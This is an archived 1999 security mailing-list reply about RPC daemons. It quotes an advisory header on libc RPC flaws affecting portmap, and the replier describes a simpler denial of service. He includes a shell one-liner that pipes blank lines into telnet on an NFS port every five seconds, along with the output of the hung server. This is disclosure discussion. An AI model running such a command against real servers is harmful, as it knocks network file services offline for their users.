On Wed, Apr 14, 1999 at 03:26:14PM +0200, Lukasz Luzar wrote: > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > ### ### ### ### ### > ### ### ### ### ### > ###### ###### ### > ### ### ### ### ### > ### ### ### ### ### > > S E C U R I T Y > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > KKI Security Team Cracow Commercial Internet, Poland > http://www.security.kki.pl http://www.kki.pl > mailto:securityat_private mailto:biuroat_private > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > Raport title : Lack of RPC's implementation in libc libraries > and how it affects for example portmap. A much easier DOS is obtained by connecting to an RPC port and just sending some random (most will do) garbage every 5 seconds. Note that this _does_ affect the UDP services in the same daemons. I have seen this bug in _every_ RPC implementation, with a few exceptions: mcserv (which does not really use the RPC protocol, only the portmapper), Sun's own nfsd [although their portmapper is buggy], and NetApp boxes. To wit: [root@koek] ~# ( while true ; do echo ; sleep 5 ; done ) | telnet zopie 2049 Trying 10.10.13.1... Connected to zopie.attic.vuurwerk.nl. Escape character is '^]'. NFS server zopie not responding, still trying. Connection closed by foreign host. [root@koek] ~# NFS server zopie OK. Right after I started the telnet, I switched to another VC and did ls /zopie, the NFS mounted disk. The ls did not give any output until I ctrl-C'ed the telnet. Greetz, Peter -- | 'He broke my heart, | Peter van Dijk | I broke his neck' | peterat_private | nognixz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl | | Hardbeat@undernet - #groningen/#kinkfm/#vdh |
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:42:45 PDT